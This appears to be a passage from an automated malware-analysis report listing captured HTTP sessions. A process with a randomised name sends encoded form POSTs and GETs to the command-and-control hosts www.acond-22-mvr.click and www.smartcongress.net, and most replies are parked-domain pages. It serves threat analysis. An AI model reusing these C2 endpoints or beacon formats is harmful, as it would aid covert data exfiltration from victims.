                                                                                                                        Data Raw: 62 42 77 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 55 2f 6f 62 54 59 45 72 4d 61 32 75 78 4f 6e 71 2b 43 4d 55 56 64 43 4d 2b 5a 6d 4e 76 64 44 2b 31 44 74 54 45 56 64 62 2f 72 46 41 79 55 32 55 38 62 30 33 46 2b 4a 52 77 70 47 49 54 42 38 38 53 46 46 42 34 4d 62 52 38 6d 6c 4d 51 61 53 44 4f 5a 51 50 52 4e 77 59 54 65 4a 42 7a 39 36 73 31 76 39 61 67 67 65 57 75 34 4b 31 5a 66 51 6c 37 34 45 54 45 35 71 36 72 54 36 68 73 44 53 30 6c 79 2b 72 4a 7a 79 61 39 41 43 4d 50 36 4a 68 6e 69 47 56 30 51 58 66 4e 37 61 78 57 59 52 56 56 76 61 2b 54 56 66 6c 4c 53 43 39 47 30 41
                                                                                                                        Data Ascii: bBw=3+GoTPvyTIkI2U/obTYErMa2uxOnq+CMUVdCM+ZmNvdD+1DtTEVdb/rFAyU2U8b03F+JRwpGITB88SFFB4MbR8mlMQaSDOZQPRNwYTeJBz96s1v9aggeWu4K1ZfQl74ETE5q6rT6hsDS0ly+rJzya9ACMP6JhniGV0QXfN7axWYRVVva+TVflLSC9G0A
                                                                                                                        Nov 21, 2024 16:21:08.677205086 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:07 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1138
                                                                                                                        x-request-id: 8f91f411-c05e-4f46-8477-ffbad6202255
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                        set-cookie: parking_session=8f91f411-c05e-4f46-8477-ffbad6202255; expires=Thu, 21 Nov 2024 15:36:08 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 21, 2024 16:21:08.677227974 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGY5MWY0MTEtYzA1ZS00ZjQ2LTg0NzctZmZiYWQ2MjAyMjU1IiwicGFnZV90aW1lIjoxNzMyMjAyND


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        6192.168.2.949854199.59.243.227806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:10.217715979 CET634OUTPOST /w9z4/ HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.acond-22-mvr.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 216
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 35 44 6e 52 48 74 51 46 56 64 65 2f 72 46 4c 53 55 7a 4c 73 62 4a 33 46 6a 38 52 79 74 47 49 54 56 38 38 54 31 46 41 4c 55 61 65 4d 6d 6e 4b 51 61 63 4d 75 5a 51 50 52 4e 77 59 54 4c 69 42 77 4e 36 76 46 66 39 61 46 41 66 49 2b 34 4e 2f 35 66 51 68 37 34 41 54 45 35 49 36 70 6e 55 68 75 4c 53 30 6c 69 2b 73 59 7a 74 54 39 41 49 43 76 37 39 77 43 66 34 52 47 49 4c 42 75 54 48 6f 32 41 33 66 55 54 45 76 68 63 45 77 63 53 6c 36 68 39 6f 4a 6d 57 41 66 77 39 5a 70 32 4b 4e 47 64 52 6a 6d 53 54 61 4d 41 3d 3d
                                                                                                                        Data Ascii: bBw=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N95DnRHtQFVde/rFLSUzLsbJ3Fj8RytGITV88T1FALUaeMmnKQacMuZQPRNwYTLiBwN6vFf9aFAfI+4N/5fQh74ATE5I6pnUhuLS0li+sYztT9AICv79wCf4RGILBuTHo2A3fUTEvhcEwcSl6h9oJmWAfw9Zp2KNGdRjmSTaMA==
                                                                                                                        Nov 21, 2024 16:21:11.429151058 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:10 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1138
                                                                                                                        x-request-id: 1b89873d-550d-42d8-bb40-b14444347d84
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                        set-cookie: parking_session=1b89873d-550d-42d8-bb40-b14444347d84; expires=Thu, 21 Nov 2024 15:36:11 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 21, 2024 16:21:11.429266930 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWI4OTg3M2QtNTUwZC00MmQ4LWJiNDAtYjE0NDQ0MzQ3ZDg0IiwicGFnZV90aW1lIjoxNzMyMjAyND


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        7192.168.2.949862199.59.243.227806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:12.889194012 CET1647OUTPOST /w9z4/ HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.acond-22-mvr.click
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 1228
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.acond-22-mvr.click/w9z4/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 33 2b 47 6f 54 50 76 79 54 49 6b 49 32 78 76 6f 5a 30 45 45 73 73 61 78 68 52 4f 6e 77 4f 43 79 55 56 42 43 4d 36 6f 37 4e 39 78 44 37 30 54 74 53 6d 39 64 5a 2f 72 46 43 79 55 49 4c 73 62 59 33 46 72 6e 52 79 68 38 49 52 74 38 2f 78 39 46 4a 61 55 61 4a 38 6d 6e 49 51 61 64 44 4f 59 53 50 52 64 4b 59 54 62 69 42 77 4e 36 76 47 58 39 54 77 67 66 50 4f 34 4b 31 5a 66 55 6c 37 34 6b 54 45 78 79 36 70 7a 71 68 65 72 53 30 46 53 2b 70 75 76 74 59 39 41 47 42 76 37 6c 77 43 62 64 52 46 73 74 42 76 33 39 6f 31 67 33 53 46 2b 75 30 44 5a 61 75 2f 57 44 74 41 39 6d 4c 47 61 69 52 51 77 53 35 44 4b 75 58 63 38 4b 7a 6d 2b 6d 62 2f 45 4c 63 6e 30 49 48 59 36 4a 42 6d 57 70 51 6e 43 64 7a 4a 4d 42 71 4e 63 34 52 64 41 39 63 71 53 72 56 6f 6a 65 79 44 67 4b 61 62 56 78 6d 42 51 54 65 39 6e 7a 72 6c 53 45 38 4b 67 62 6e 63 30 4f 41 7a 43 51 4e 36 6f 6b 39 79 75 47 39 47 4c 43 46 45 71 6d 65 44 2f 58 4a 54 64 59 66 33 62 55 5a 43 51 50 76 71 39 5a 71 51 69 37 79 7a 6d 73 6a 56 77 37 6d 7a 75 52 73 47 [TRUNCATED]
                                                                                                                        Data Ascii: bBw=3+GoTPvyTIkI2xvoZ0EEssaxhROnwOCyUVBCM6o7N9xD70TtSm9dZ/rFCyUILsbY3FrnRyh8IRt8/x9FJaUaJ8mnIQadDOYSPRdKYTbiBwN6vGX9TwgfPO4K1ZfUl74kTExy6pzqherS0FS+puvtY9AGBv7lwCbdRFstBv39o1g3SF+u0DZau/WDtA9mLGaiRQwS5DKuXc8Kzm+mb/ELcn0IHY6JBmWpQnCdzJMBqNc4RdA9cqSrVojeyDgKabVxmBQTe9nzrlSE8Kgbnc0OAzCQN6ok9yuG9GLCFEqmeD/XJTdYf3bUZCQPvq9ZqQi7yzmsjVw7mzuRsGu9/RRTSIJPoXRAJcQsFBbmdxolp6kvFEzZEjh3WVyvfHPgdpEQR4eJJbvLuR1nEmYnpKL+7vNerAkuK6PyHkEuirBjpRtftw55yZ/fhcixA5srTlpzoiIjyuOUgJNkWl+si+bluT+QTQlDX2hr4SqGne7rzSK8tdtxwIRx9cvXlkgr8FOI7iN8R18pxS+cNAwKsts55CUnh/8QwtjN4hcblQ/sw35J6xHBerPFa788mfuoY94dkszbifwIvry7avI1SEepjJjUbK7nQ0O3+oQ5C3PXh0kxe04vfM6+MF9PeXf05rInhRRY0gZ+Vhwut7sllET5IkUE28fKSOjrKwB4k3bTgnaN/2w0DGB1R+2gUk/cZaJa3UMIAoknt3ImdJR/VJr8VNth9mWB6HK1ZDiJXPWb2td4S5H28w5Kt8qrml56bJql4QziGul0SjKyEAI2e+yvNHA0hKKFSXV9oUZ5Tjx+3OTmx28ksN3JtKl5Z0jgeeDbW1e9q4/zDcfl+nywmKfqnn1r9WY9t6doYvqlVdy+yQ890RRyvWWksYozwIdDpzdhMR2dsc4Zk618r85aMlWEQe+53dULcapE7HF99xi9No4JhoY1P/3P2rqHUl1tajwMSn5BHqvuKwMcMAdrrHD8xrW9Y1uzPw1rr6dxYHKtanisxO6x [TRUNCATED]
                                                                                                                        Nov 21, 2024 16:21:14.046539068 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:13 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1138
                                                                                                                        x-request-id: 904ca94f-6844-4944-9cf3-f2edeca78b9c
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==
                                                                                                                        set-cookie: parking_session=904ca94f-6844-4944-9cf3-f2edeca78b9c; expires=Thu, 21 Nov 2024 15:36:13 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 50 74 6f 70 4b 53 75 39 4f 64 57 58 5a 56 4c 51 52 33 5a 37 6f 66 4d 4f 64 6a 6c 4c 78 39 75 71 42 41 38 44 49 7a 30 36 6d 57 46 77 33 76 31 67 4a 71 77 37 6a 53 43 6a 61 6a 73 68 48 54 62 6a 43 39 6e 52 63 4d 68 52 59 6a 48 2b 33 66 54 38 49 57 5a 6a 6b 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_PtopKSu9OdWXZVLQR3Z7ofMOdjlLx9uqBA8DIz06mWFw3v1gJqw7jSCjajshHTbjC9nRcMhRYjH+3fT8IWZjkQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 21, 2024 16:21:14.046560049 CET591INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTA0Y2E5NGYtNjg0NC00OTQ0LTljZjMtZjJlZGVjYTc4YjljIiwicGFnZV90aW1lIjoxNzMyMjAyND


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.949870199.59.243.227806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:15.545063972 CET344OUTGET /w9z4/?PBk=f4VDN8Bp14IhbV&bBw=68uIQ7XuXrYyzH38eAwIlcni4Dy1meyAWnVnC6Q+cYkMiUv2YFR7SOjLNBcUXcnE4X2lRQ1sPBZfnUN4AIhfaaqVLjCwQ54vPxpQXxXjIS5xkDmSEw== HTTP/1.1
                                                                                                                        Host: www.acond-22-mvr.click
                                                                                                                        Accept: */*
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Connection: close
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Nov 21, 2024 16:21:16.676485062 CET1236INHTTP/1.1 200 OK
                                                                                                                        date: Thu, 21 Nov 2024 15:21:15 GMT
                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                        content-length: 1466
                                                                                                                        x-request-id: 0110851f-da16-4fea-bf3a-3b5a44e1032e
                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HrPV9HWYPAFlLGj0s2tnQ2+ujEMKV6GEjfnhmiRa0ldI7t4Qi0+osfXO3iKXB5EHWRBbqmlMXZq+NOoflCluoQ==
                                                                                                                        set-cookie: parking_session=0110851f-da16-4fea-bf3a-3b5a44e1032e; expires=Thu, 21 Nov 2024 15:36:16 GMT; path=/
                                                                                                                        connection: close
                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 72 50 56 39 48 57 59 50 41 46 6c 4c 47 6a 30 73 32 74 6e 51 32 2b 75 6a 45 4d 4b 56 36 47 45 6a 66 6e 68 6d 69 52 61 30 6c 64 49 37 74 34 51 69 30 2b 6f 73 66 58 4f 33 69 4b 58 42 35 45 48 57 52 42 62 71 6d 6c 4d 58 5a 71 2b 4e 4f 6f 66 6c 43 6c 75 6f 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HrPV9HWYPAFlLGj0s2tnQ2+ujEMKV6GEjfnhmiRa0ldI7t4Qi0+osfXO3iKXB5EHWRBbqmlMXZq+NOoflCluoQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                        Nov 21, 2024 16:21:16.676573038 CET919INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDExMDg1MWYtZGExNi00ZmVhLWJmM2EtM2I1YTQ0ZTEwMzJlIiwicGFnZV90aW1lIjoxNzMyMjAyND


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.949887146.88.233.115806608C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        Nov 21, 2024 16:21:22.965431929 CET607OUTPOST /11t3/ HTTP/1.1
                                                                                                                        Host: www.smartcongress.net
                                                                                                                        Accept: */*
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Origin: http://www.smartcongress.net
                                                                                                                        Cache-Control: max-age=0
                                                                                                                        Content-Length: 192
                                                                                                                        Connection: close
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Referer: http://www.smartcongress.net/11t3/
                                                                                                                        User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                                                        Data Raw: 62 42 77 3d 4d 71 2f 77 62 54 56 45 64 76 5a 61 37 75 6c 53 46 76 73 72 72 50 42 73 53 68 33 50 34 2b 66 65 5a 6c 4c 46 7a 54 74 52 2f 39 34 38 73 5a 45 50 54 6c 41 34 2b 6c 67 79 63 34 68 76 4f 7a 70 71 45 6e 33 35 48 52 59 31 6b 61 76 72 77 6a 32 37 48 31 73 37 30 4a 49 35 43 42 50 6b 4c 4c 46 62 78 47 30 6a 61 68 68 44 44 54 2b 4f 5a 78 44 53 53 5a 38 44 48 59 4d 31 66 62 68 42 38 7a 73 64 57 34 67 4c 67 56 38 2f 72 6b 54 41 73 66 37 53 70 70 62 70 33 6a 6d 45 33 75 73 76 30 4f 58 6d 2b 62 30 4d 73 31 54 69 4e 53 38 35 6c 59 4b 79 42 32 58 31 41 41 6d 50 32 50 4c 6c
                                                                                                                        Data Ascii: bBw=Mq/wbTVEdvZa7ulSFvsrrPBsSh3P4+feZlLFzTtR/948sZEPTlA4+lgyc4hvOzpqEn35HRY1kavrwj27H1s70JI5CBPkLLFbxG0jahhDDT+OZxDSSZ8DHYM1fbhB8zsdW4gLgV8/rkTAsf7Sppbp3jmE3usv0OXm+b0Ms1TiNS85lYKyB2X1AAmP2PLl
                                                                                                                        Nov 21, 2024 16:21:24.509103060 CET380INHTTP/1.1 404 Not Found
                                                                                                                        content-type: text/html; charset=iso-8859-1
                                                                                                                        content-length: 196
                                                                                                                        date: Thu, 21 Nov 2024 15:21:24 GMT
                                                                                                                        server: LiteSpeed
                                                                                                                        x-tuned-by: N0C
                                                                                                                        connection: close
